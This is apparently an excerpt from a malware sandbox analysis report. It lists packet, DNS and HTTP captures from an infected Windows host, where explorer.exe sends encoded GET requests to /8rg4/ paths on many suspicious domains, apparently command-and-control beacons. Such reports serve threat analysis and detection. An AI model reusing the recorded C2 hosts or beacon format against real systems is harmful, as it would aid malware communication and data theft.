Jan 13, 2021 20:50:38.267479897 CET	80	49765	195.78.66.137	192.168.2.3
Jan 13, 2021 20:50:38.267498970 CET	80	49765	195.78.66.137	192.168.2.3
Jan 13, 2021 20:50:38.267522097 CET	80	49765	195.78.66.137	192.168.2.3
Jan 13, 2021 20:50:38.267543077 CET	80	49765	195.78.66.137	192.168.2.3
Jan 13, 2021 20:50:38.267545938 CET	49765	80	192.168.2.3	195.78.66.137
Jan 13, 2021 20:50:38.267559052 CET	80	49765	195.78.66.137	192.168.2.3
Jan 13, 2021 20:50:38.267570972 CET	49765	80	192.168.2.3	195.78.66.137
Jan 13, 2021 20:50:38.267574072 CET	49765	80	192.168.2.3	195.78.66.137
Jan 13, 2021 20:50:38.267576933 CET	80	49765	195.78.66.137	192.168.2.3
Jan 13, 2021 20:50:38.267623901 CET	49765	80	192.168.2.3	195.78.66.137
Jan 13, 2021 20:50:38.294904947 CET	80	49765	195.78.66.137	192.168.2.3
Jan 13, 2021 20:50:38.295159101 CET	49765	80	192.168.2.3	195.78.66.137

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 20:47:20.163229942 CET	57544	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:47:20.211036921 CET	53	57544	8.8.8.8	192.168.2.3
Jan 13, 2021 20:47:21.107830048 CET	55984	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:47:21.158705950 CET	53	55984	8.8.8.8	192.168.2.3
Jan 13, 2021 20:47:22.038727045 CET	64185	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:47:22.095300913 CET	53	64185	8.8.8.8	192.168.2.3
Jan 13, 2021 20:47:23.300674915 CET	65110	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:47:23.348737955 CET	53	65110	8.8.8.8	192.168.2.3
Jan 13, 2021 20:47:24.260226011 CET	58361	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:47:24.316452026 CET	53	58361	8.8.8.8	192.168.2.3
Jan 13, 2021 20:47:25.244940996 CET	63492	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:47:25.295751095 CET	53	63492	8.8.8.8	192.168.2.3
Jan 13, 2021 20:47:26.340733051 CET	60831	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:47:26.391526937 CET	53	60831	8.8.8.8	192.168.2.3
Jan 13, 2021 20:47:27.463809967 CET	60100	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:47:27.514486074 CET	53	60100	8.8.8.8	192.168.2.3
Jan 13, 2021 20:47:28.940273046 CET	53195	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:47:28.988276005 CET	53	53195	8.8.8.8	192.168.2.3
Jan 13, 2021 20:47:29.887504101 CET	50141	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:47:29.938234091 CET	53	50141	8.8.8.8	192.168.2.3
Jan 13, 2021 20:47:40.247060061 CET	53023	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:47:40.295018911 CET	53	53023	8.8.8.8	192.168.2.3
Jan 13, 2021 20:47:42.273008108 CET	49563	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:47:42.320925951 CET	53	49563	8.8.8.8	192.168.2.3
Jan 13, 2021 20:47:44.671813965 CET	51352	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:47:44.728101969 CET	53	51352	8.8.8.8	192.168.2.3
Jan 13, 2021 20:47:45.629502058 CET	59349	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:47:45.677798033 CET	53	59349	8.8.8.8	192.168.2.3
Jan 13, 2021 20:47:46.589325905 CET	57084	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:47:46.637273073 CET	53	57084	8.8.8.8	192.168.2.3
Jan 13, 2021 20:47:47.681009054 CET	58823	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:47:47.739073992 CET	53	58823	8.8.8.8	192.168.2.3
Jan 13, 2021 20:48:00.193825006 CET	57568	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:48:00.241695881 CET	53	57568	8.8.8.8	192.168.2.3
Jan 13, 2021 20:48:09.734285116 CET	50540	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:48:09.793548107 CET	53	50540	8.8.8.8	192.168.2.3
Jan 13, 2021 20:48:09.890402079 CET	54366	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:48:09.938431978 CET	53	54366	8.8.8.8	192.168.2.3
Jan 13, 2021 20:48:12.204257965 CET	53034	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:48:12.262058020 CET	53	53034	8.8.8.8	192.168.2.3
Jan 13, 2021 20:48:16.251451969 CET	57762	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:48:16.312657118 CET	53	57762	8.8.8.8	192.168.2.3
Jan 13, 2021 20:48:24.732445955 CET	55435	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:48:24.792561054 CET	53	55435	8.8.8.8	192.168.2.3
Jan 13, 2021 20:48:28.878324986 CET	50713	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:48:28.929086924 CET	53	50713	8.8.8.8	192.168.2.3
Jan 13, 2021 20:48:29.987207890 CET	56132	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:48:30.069827080 CET	53	56132	8.8.8.8	192.168.2.3
Jan 13, 2021 20:48:35.444365978 CET	58987	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:48:35.509836912 CET	53	58987	8.8.8.8	192.168.2.3
Jan 13, 2021 20:48:37.973656893 CET	56579	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:48:38.021651983 CET	53	56579	8.8.8.8	192.168.2.3
Jan 13, 2021 20:48:40.518562078 CET	60633	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:48:40.723067999 CET	53	60633	8.8.8.8	192.168.2.3
Jan 13, 2021 20:48:42.083743095 CET	61292	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:48:42.141818047 CET	53	61292	8.8.8.8	192.168.2.3
Jan 13, 2021 20:48:45.746731043 CET	63619	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:48:45.832438946 CET	53	63619	8.8.8.8	192.168.2.3
Jan 13, 2021 20:48:51.125051975 CET	64938	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:48:51.204478979 CET	53	64938	8.8.8.8	192.168.2.3
Jan 13, 2021 20:48:56.346642017 CET	61946	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:48:56.410253048 CET	53	61946	8.8.8.8	192.168.2.3
Jan 13, 2021 20:49:01.614154100 CET	64910	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:49:01.841878891 CET	53	64910	8.8.8.8	192.168.2.3
Jan 13, 2021 20:49:07.481575012 CET	52123	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:49:07.567187071 CET	53	52123	8.8.8.8	192.168.2.3
Jan 13, 2021 20:49:13.174890995 CET	56130	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:49:13.253691912 CET	53	56130	8.8.8.8	192.168.2.3
Jan 13, 2021 20:49:13.601075888 CET	56338	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:49:13.649050951 CET	53	56338	8.8.8.8	192.168.2.3
Jan 13, 2021 20:49:14.937787056 CET	59420	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:49:14.994203091 CET	53	59420	8.8.8.8	192.168.2.3
Jan 13, 2021 20:49:18.276005030 CET	58784	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:49:18.352054119 CET	53	58784	8.8.8.8	192.168.2.3
Jan 13, 2021 20:49:28.418977022 CET	63978	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:49:28.509651899 CET	53	63978	8.8.8.8	192.168.2.3
Jan 13, 2021 20:49:33.521580935 CET	62938	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:49:33.591161013 CET	53	62938	8.8.8.8	192.168.2.3
Jan 13, 2021 20:49:38.785815001 CET	55708	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:49:39.095535040 CET	53	55708	8.8.8.8	192.168.2.3
Jan 13, 2021 20:50:03.019531965 CET	56803	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:50:03.076298952 CET	53	56803	8.8.8.8	192.168.2.3
Jan 13, 2021 20:50:08.083200932 CET	57145	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:50:08.322495937 CET	53	57145	8.8.8.8	192.168.2.3
Jan 13, 2021 20:50:09.690120935 CET	55359	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:50:09.749203920 CET	53	55359	8.8.8.8	192.168.2.3
Jan 13, 2021 20:50:10.399548054 CET	58306	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:50:10.456119061 CET	53	58306	8.8.8.8	192.168.2.3
Jan 13, 2021 20:50:11.136198044 CET	64124	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:50:11.199878931 CET	53	64124	8.8.8.8	192.168.2.3
Jan 13, 2021 20:50:11.707850933 CET	49361	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:50:11.755697012 CET	53	49361	8.8.8.8	192.168.2.3
Jan 13, 2021 20:50:12.352400064 CET	63150	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:50:12.400408983 CET	53	63150	8.8.8.8	192.168.2.3
Jan 13, 2021 20:50:13.165945053 CET	53279	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:50:13.225104094 CET	53	53279	8.8.8.8	192.168.2.3
Jan 13, 2021 20:50:14.024653912 CET	56881	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:50:14.072810888 CET	53	56881	8.8.8.8	192.168.2.3
Jan 13, 2021 20:50:14.967556000 CET	53642	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:50:15.024226904 CET	53	53642	8.8.8.8	192.168.2.3
Jan 13, 2021 20:50:16.159085989 CET	55667	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:50:16.210145950 CET	53	55667	8.8.8.8	192.168.2.3
Jan 13, 2021 20:50:16.814532995 CET	54833	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:50:16.862567902 CET	53	54833	8.8.8.8	192.168.2.3
Jan 13, 2021 20:50:43.243957996 CET	62476	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:50:43.302779913 CET	53	62476	8.8.8.8	192.168.2.3
Jan 13, 2021 20:50:48.316194057 CET	49705	53	192.168.2.3	8.8.8.8
Jan 13, 2021 20:50:48.372716904 CET	53	49705	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 13, 2021 20:48:16.251451969 CET	192.168.2.3	8.8.8.8	0xafbd	Standard query (0)	www.100feetpics.com	A (IP address)	IN (0x0001)
Jan 13, 2021 20:48:24.732445955 CET	192.168.2.3	8.8.8.8	0x9cee	Standard query (0)	www.reversehomeloansmiami.com	A (IP address)	IN (0x0001)
Jan 13, 2021 20:48:29.987207890 CET	192.168.2.3	8.8.8.8	0xca5b	Standard query (0)	www.tomatrader.com	A (IP address)	IN (0x0001)
Jan 13, 2021 20:48:35.444365978 CET	192.168.2.3	8.8.8.8	0xf23b	Standard query (0)	www.jizhoujsp.com	A (IP address)	IN (0x0001)
Jan 13, 2021 20:48:40.518562078 CET	192.168.2.3	8.8.8.8	0x3009	Standard query (0)	www.8million-lr.com	A (IP address)	IN (0x0001)
Jan 13, 2021 20:48:45.746731043 CET	192.168.2.3	8.8.8.8	0x6ad5	Standard query (0)	www.futbolclubbarcelona.soccer	A (IP address)	IN (0x0001)
Jan 13, 2021 20:48:51.125051975 CET	192.168.2.3	8.8.8.8	0x6fb0	Standard query (0)	www.ondesign03.net	A (IP address)	IN (0x0001)
Jan 13, 2021 20:48:56.346642017 CET	192.168.2.3	8.8.8.8	0xbac8	Standard query (0)	www.crafteest.com	A (IP address)	IN (0x0001)
Jan 13, 2021 20:49:01.614154100 CET	192.168.2.3	8.8.8.8	0x67b8	Standard query (0)	www.4037a.com	A (IP address)	IN (0x0001)
Jan 13, 2021 20:49:07.481575012 CET	192.168.2.3	8.8.8.8	0x7034	Standard query (0)	www.puzelhome.com	A (IP address)	IN (0x0001)
Jan 13, 2021 20:49:13.174890995 CET	192.168.2.3	8.8.8.8	0xaecb	Standard query (0)	www.tootleshook.com	A (IP address)	IN (0x0001)
Jan 13, 2021 20:49:18.276005030 CET	192.168.2.3	8.8.8.8	0xec80	Standard query (0)	www.hechoenvegas.net	A (IP address)	IN (0x0001)
Jan 13, 2021 20:49:28.418977022 CET	192.168.2.3	8.8.8.8	0xc7a7	Standard query (0)	www.jorgegiljewelry.com	A (IP address)	IN (0x0001)
Jan 13, 2021 20:49:33.521580935 CET	192.168.2.3	8.8.8.8	0x68a0	Standard query (0)	www.bodyfuelrtd.com	A (IP address)	IN (0x0001)
Jan 13, 2021 20:49:38.785815001 CET	192.168.2.3	8.8.8.8	0xf53c	Standard query (0)	www.amazon-support-recovery.com	A (IP address)	IN (0x0001)
Jan 13, 2021 20:50:03.019531965 CET	192.168.2.3	8.8.8.8	0x7467	Standard query (0)	www.jizhoujsp.com	A (IP address)	IN (0x0001)
Jan 13, 2021 20:50:08.083200932 CET	192.168.2.3	8.8.8.8	0xf535	Standard query (0)	www.8million-lr.com	A (IP address)	IN (0x0001)
Jan 13, 2021 20:50:43.243957996 CET	192.168.2.3	8.8.8.8	0x7ff7	Standard query (0)	www.tootleshook.com	A (IP address)	IN (0x0001)
Jan 13, 2021 20:50:48.316194057 CET	192.168.2.3	8.8.8.8	0x59e4	Standard query (0)	www.hechoenvegas.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 13, 2021 20:48:16.312657118 CET	8.8.8.8	192.168.2.3	0xafbd	No error (0)	www.100feetpics.com	100feetpics.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:48:16.312657118 CET	8.8.8.8	192.168.2.3	0xafbd	No error (0)	100feetpics.com		184.168.131.241	A (IP address)	IN (0x0001)
Jan 13, 2021 20:48:16.312657118 CET	8.8.8.8	192.168.2.3	0xafbd	No error (0)	100feetpics.com		213.32.7.131	A (IP address)	IN (0x0001)
Jan 13, 2021 20:48:24.792561054 CET	8.8.8.8	192.168.2.3	0x9cee	No error (0)	www.reversehomeloansmiami.com	reversehomeloansmiami.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:48:24.792561054 CET	8.8.8.8	192.168.2.3	0x9cee	No error (0)	reversehomeloansmiami.com		34.102.136.180	A (IP address)	IN (0x0001)
Jan 13, 2021 20:48:30.069827080 CET	8.8.8.8	192.168.2.3	0xca5b	No error (0)	www.tomatrader.com		37.48.65.150	A (IP address)	IN (0x0001)
Jan 13, 2021 20:48:35.509836912 CET	8.8.8.8	192.168.2.3	0xf23b	Name error (3)	www.jizhoujsp.com	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 20:48:40.723067999 CET	8.8.8.8	192.168.2.3	0x3009	Server failure (2)	www.8million-lr.com	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 20:48:45.832438946 CET	8.8.8.8	192.168.2.3	0x6ad5	No error (0)	www.futbolclubbarcelona.soccer		54.208.77.124	A (IP address)	IN (0x0001)
Jan 13, 2021 20:48:45.832438946 CET	8.8.8.8	192.168.2.3	0x6ad5	No error (0)	www.futbolclubbarcelona.soccer		34.206.12.234	A (IP address)	IN (0x0001)
Jan 13, 2021 20:48:45.832438946 CET	8.8.8.8	192.168.2.3	0x6ad5	No error (0)	www.futbolclubbarcelona.soccer		35.169.58.188	A (IP address)	IN (0x0001)
Jan 13, 2021 20:48:51.204478979 CET	8.8.8.8	192.168.2.3	0x6fb0	No error (0)	www.ondesign03.net		135.181.31.212	A (IP address)	IN (0x0001)
Jan 13, 2021 20:48:56.410253048 CET	8.8.8.8	192.168.2.3	0xbac8	No error (0)	www.crafteest.com	crafteest.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:48:56.410253048 CET	8.8.8.8	192.168.2.3	0xbac8	No error (0)	crafteest.com		34.102.136.180	A (IP address)	IN (0x0001)
Jan 13, 2021 20:49:01.841878891 CET	8.8.8.8	192.168.2.3	0x67b8	No error (0)	www.4037a.com		104.233.238.207	A (IP address)	IN (0x0001)
Jan 13, 2021 20:49:07.567187071 CET	8.8.8.8	192.168.2.3	0x7034	No error (0)	www.puzelhome.com		195.78.66.137	A (IP address)	IN (0x0001)
Jan 13, 2021 20:49:13.253691912 CET	8.8.8.8	192.168.2.3	0xaecb	Name error (3)	www.tootleshook.com	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 20:49:18.352054119 CET	8.8.8.8	192.168.2.3	0xec80	Name error (3)	www.hechoenvegas.net	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 20:49:28.509651899 CET	8.8.8.8	192.168.2.3	0xc7a7	Name error (3)	www.jorgegiljewelry.com	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 20:49:33.591161013 CET	8.8.8.8	192.168.2.3	0x68a0	No error (0)	www.bodyfuelrtd.com	bodyfuelrtd.com		CNAME (Canonical name)	IN (0x0001)
Jan 13, 2021 20:49:33.591161013 CET	8.8.8.8	192.168.2.3	0x68a0	No error (0)	bodyfuelrtd.com		34.102.136.180	A (IP address)	IN (0x0001)
Jan 13, 2021 20:49:39.095535040 CET	8.8.8.8	192.168.2.3	0xf53c	Server failure (2)	www.amazon-support-recovery.com	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 20:50:03.076298952 CET	8.8.8.8	192.168.2.3	0x7467	Name error (3)	www.jizhoujsp.com	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 20:50:08.322495937 CET	8.8.8.8	192.168.2.3	0xf535	Server failure (2)	www.8million-lr.com	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 20:50:43.302779913 CET	8.8.8.8	192.168.2.3	0x7ff7	Name error (3)	www.tootleshook.com	none	none	A (IP address)	IN (0x0001)
Jan 13, 2021 20:50:48.372716904 CET	8.8.8.8	192.168.2.3	0x59e4	Name error (3)	www.hechoenvegas.net	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.100feetpics.com

www.reversehomeloansmiami.com

www.tomatrader.com

www.futbolclubbarcelona.soccer

www.ondesign03.net

www.crafteest.com

www.4037a.com

www.puzelhome.com

www.bodyfuelrtd.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49728	184.168.131.241	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:48:19.505085945 CET	992	OUT	GET /8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/ HTTP/1.1 Host: www.100feetpics.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 20:48:19.726598978 CET	993	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.16.1 Date: Wed, 13 Jan 2021 19:48:19 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Location: https://100-feet-pics.mykreezalid.com/8rg4/?Jt7=XPy4nFjH&GXITC=08IHb1lQuD80K2/lta3mrgdssoTum8+9mcHmJtD55/wROMTw7+mwrmz+mPvAzJuG4KH/ Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49729	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:48:24.834045887 CET	994	OUT	GET /8rg4/?GXITC=2jJ/qm7WeU7abLdhXDZkd7Arg0EZ9XlPGLroBRqQ6Di77cQJgzzO3seHyf0gHZAuKIFG&Jt7=XPy4nFjH HTTP/1.1 Host: www.reversehomeloansmiami.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 20:48:24.972836971 CET	995	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Jan 2021 19:48:24 GMT Content-Type: text/html Content-Length: 275 ETag: "5ffc838f-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49749	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:49:52.606587887 CET	5468	OUT	GET /8rg4/?GXITC=2jJ/qm7WeU7abLdhXDZkd7Arg0EZ9XlPGLroBRqQ6Di77cQJgzzO3seHyf0gHZAuKIFG&Jt7=XPy4nFjH HTTP/1.1 Host: www.reversehomeloansmiami.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 20:49:52.745198011 CET	5468	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Jan 2021 19:49:52 GMT Content-Type: text/html Content-Length: 275 ETag: "5ffc838f-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49750	37.48.65.150	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:49:57.804774046 CET	5469	OUT	GET /8rg4/?Jt7=XPy4nFjH&GXITC=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV HTTP/1.1 Host: www.tomatrader.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 20:49:57.975606918 CET	5470	IN	HTTP/1.1 200 OK cache-control: max-age=0, private, must-revalidate connection: close content-length: 567 content-type: text/html; charset=utf-8 date: Wed, 13 Jan 2021 19:49:57 GMT server: nginx set-cookie: sid=83db6fca-55d8-11eb-a254-55f92d3d53b3; path=/; domain=.tomatrader.com; expires=Mon, 31 Jan 2089 23:04:04 GMT; max-age=2147483647; HttpOnly Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 74 6f 6d 61 74 72 61 64 65 72 2e 63 6f 6d 2f 38 72 67 34 2f 3f 47 58 49 54 43 3d 6f 73 69 2b 41 31 30 7a 38 55 66 46 2b 68 4c 50 4d 6a 4a 59 6d 70 48 4b 79 68 49 6c 62 49 45 56 41 39 42 30 63 31 63 66 42 5a 4f 2b 6e 52 68 47 67 37 4f 31 42 33 78 7a 38 32 45 50 54 67 74 70 4e 32 4e 56 26 4a 74 37 3d 58 50 79 34 6e 46 6a 48 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 59 78 4d 44 55 33 4e 44 55 35 4e 79 77 69 61 57 46 30 49 6a 6f 78 4e 6a 45 77 4e 54 59 33 4d 7a 6b 33 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 63 47 4e 31 4e 54 42 32 4f 58 5a 70 5a 6a 59 77 63 54 64 71 61 47 4d 79 61 32 6f 32 62 54 59 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 32 4d 54 41 31 4e 6a 63 7a 4f 54 63 73 49 6e 52 7a 49 6a 6f 78 4e 6a 45 77 4e 54 59 33 4d 7a 6b 33 4f 54 55 31 4e 7a 67 79 66 51 2e 79 33 32 61 51 49 4c 75 75 59 45 6f 5f 48 77 58 49 56 31 4d 64 41 6c 59 34 4e 41 61 61 2d 75 42 35 57 75 7a 4c 4f 64 4e 66 6d 6f 26 73 69 64 3d 38 33 64 62 36 66 63 61 2d 35 35 64 38 2d 31 31 65 62 2d 61 32 35 34 2d 35 35 66 39 32 64 33 64 35 33 62 33 27 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.tomatrader.com/8rg4/?GXITC=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV&Jt7=XPy4nFjH&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTYxMDU3NDU5NywiaWF0IjoxNjEwNTY3Mzk3LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIycGN1NTB2OXZpZjYwcTdqaGMya2o2bTYiLCJuYmYiOjE2MTA1NjczOTcsInRzIjoxNjEwNTY3Mzk3OTU1NzgyfQ.y32aQILuuYEo_HwXIV1MdAlY4NAaa-uB5WuzLOdNfmo&sid=83db6fca-55d8-11eb-a254-55f92d3d53b3');</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49757	54.208.77.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:50:13.457475901 CET	5772	OUT	GET /8rg4/?GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH HTTP/1.1 Host: www.futbolclubbarcelona.soccer Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
